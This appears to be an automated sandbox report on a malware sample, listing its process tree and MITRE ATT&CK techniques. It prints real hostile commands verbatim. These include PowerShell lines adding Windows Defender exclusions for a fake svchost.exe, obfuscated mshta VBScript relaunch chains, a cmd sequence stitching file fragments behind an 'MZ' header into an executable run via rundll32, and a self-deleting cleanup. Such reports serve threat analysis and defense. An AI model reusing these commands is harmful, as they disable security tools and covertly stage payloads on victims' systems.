- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Cursors\veejays\svchost.exe" -Force
    3⤵
    PID:7312
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regsql.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regsql.exe"
    3⤵
    PID:8324
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Cursors\veejays\svchost.exe" -Force
  2⤵
  PID:3812
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\EEBA.exe" -Force
  2⤵
  PID:5152
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Cursors\veejays\svchost.exe" -Force
  2⤵
  PID:5124
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe"
  2⤵
  PID:8864

C:\Users\Admin\AppData\Local\Temp\3C9.exe
C:\Users\Admin\AppData\Local\Temp\3C9.exe
1⤵
PID:6904
- C:\Windows\SysWOW64\mshta.exe
  "C:\Windows\System32\mshta.exe" VbsCRIPt: CloSE (CrEATEOBJECT ("WscriPT.ShEll"). rUn ( "C:\Windows\system32\cmd.exe /r cOPy /y ""C:\Users\Admin\AppData\Local\Temp\3C9.exe"" ..\YGu6dRX.eXE && STart ..\YGU6DRX.exE -pEu3VPItrF6pCIFoPfAdI7 & iF """" == """" for %Q iN ( ""C:\Users\Admin\AppData\Local\Temp\3C9.exe"" ) do taskkill /im ""%~nXQ"" -f ", 0,TRUe ))
  2⤵
  PID:6148
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /r cOPy /y "C:\Users\Admin\AppData\Local\Temp\3C9.exe" ..\YGu6dRX.eXE && STart ..\YGU6DRX.exE -pEu3VPItrF6pCIFoPfAdI7 & iF "" =="" for %Q iN ("C:\Users\Admin\AppData\Local\Temp\3C9.exe" ) do taskkill /im "%~nXQ" -f
    3⤵
    PID:8684
  - - C:\Users\Admin\AppData\Local\Temp\YGu6dRX.eXE
      ..\YGU6DRX.exE -pEu3VPItrF6pCIFoPfAdI7
      4⤵
      PID:8296
    - - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" VbsCRIPt: CloSE (CrEATEOBJECT ("WscriPT.ShEll"). rUn ( "C:\Windows\system32\cmd.exe /r cOPy /y ""C:\Users\Admin\AppData\Local\Temp\YGu6dRX.eXE"" ..\YGu6dRX.eXE && STart ..\YGU6DRX.exE -pEu3VPItrF6pCIFoPfAdI7 & iF ""-pEu3VPItrF6pCIFoPfAdI7 "" == """" for %Q iN ( ""C:\Users\Admin\AppData\Local\Temp\YGu6dRX.eXE"" ) do taskkill /im ""%~nXQ"" -f ", 0,TRUe ))
        5⤵
        
        PID:8352
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /r cOPy /y "C:\Users\Admin\AppData\Local\Temp\YGu6dRX.eXE" ..\YGu6dRX.eXE && STart ..\YGU6DRX.exE -pEu3VPItrF6pCIFoPfAdI7 & iF "-pEu3VPItrF6pCIFoPfAdI7 " =="" for %Q iN ("C:\Users\Admin\AppData\Local\Temp\YGu6dRX.eXE" ) do taskkill /im "%~nXQ" -f
        6⤵
        
        PID:9032
    - - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vbSCrIPt:ClosE ( CReatEoBJect ( "wSCRiPt.sHELl"). rUN( "CMd.EXE /q /R Echo | SET /p = ""MZ"" >G52~.M & cOpY /y /B g52~.M + MyDCSYS.aJ2 + SoLi.X + NlEYUAM.J + VrTf6S.Kuq+ JAWQ.UF + 5CkHYa.YmN ..\FJ~iiI.s & DEL /q *& sTart control ..\FJ~iII.s " , 0,tRue ))
        5⤵
        
        PID:9880
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /q /R Echo | SET /p = "MZ" >G52~.M & cOpY /y /B g52~.M + MyDCSYS.aJ2+SoLi.X + NlEYUAM.J + VrTf6S.Kuq+JAWQ.UF+5CkHYa.YmN ..\FJ~iiI.s &DEL /q *& sTart control ..\FJ~iII.s
        6⤵
        
        PID:9416
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" Echo "
        7⤵
        
        PID:9432
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" SET /p = "MZ" 1>G52~.M"
        7⤵
        
        PID:6716
        
        C:\Windows\SysWOW64\control.exe
        
        control ..\FJ~iII.s
        7⤵
        
        PID:9480
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL ..\FJ~iII.s
        8⤵
        
        PID:8016
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /im "3C9.exe" -f
      4⤵
      Kills process with taskkill
      PID:6788

C:\Users\Admin\AppData\Local\Temp\2608.exe
C:\Users\Admin\AppData\Local\Temp\2608.exe
1⤵
PID:7924
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c taskkill /im 2608.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\2608.exe" & del C:\ProgramData\*.dll & exit
  2⤵
  PID:5748
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im 2608.exe /f
    3⤵
    - Kills process with taskkill
    PID:8636
- - C:\Windows\SysWOW64\timeout.exe
    timeout /t 6
    3⤵
    - Delays execution with timeout.exe
    PID:5864

C:\Users\Admin\AppData\Local\Temp\B5F5.exe
C:\Users\Admin\AppData\Local\Temp\B5F5.exe
1⤵
PID:2600

C:\Users\Admin\AppData\Local\Temp\FBE.exe
C:\Users\Admin\AppData\Local\Temp\FBE.exe
1⤵
PID:8600

C:\Users\Admin\AppData\Local\Temp\5D14.exe
C:\Users\Admin\AppData\Local\Temp\5D14.exe
1⤵
PID:8740

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Command-Line Interface

T1059

Scheduled Task

Persistence

Modify Existing Service

T1031

New Service

T1050

Scheduled Task

Privilege Escalation

New Service

T1050

Scheduled Task

Defense Evasion

Disabling Security Tools

T1089

File and Directory Permissions Modification

T1222

Install Root Certificate

T1130

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

Remote System Discovery

T1018

System Information Discovery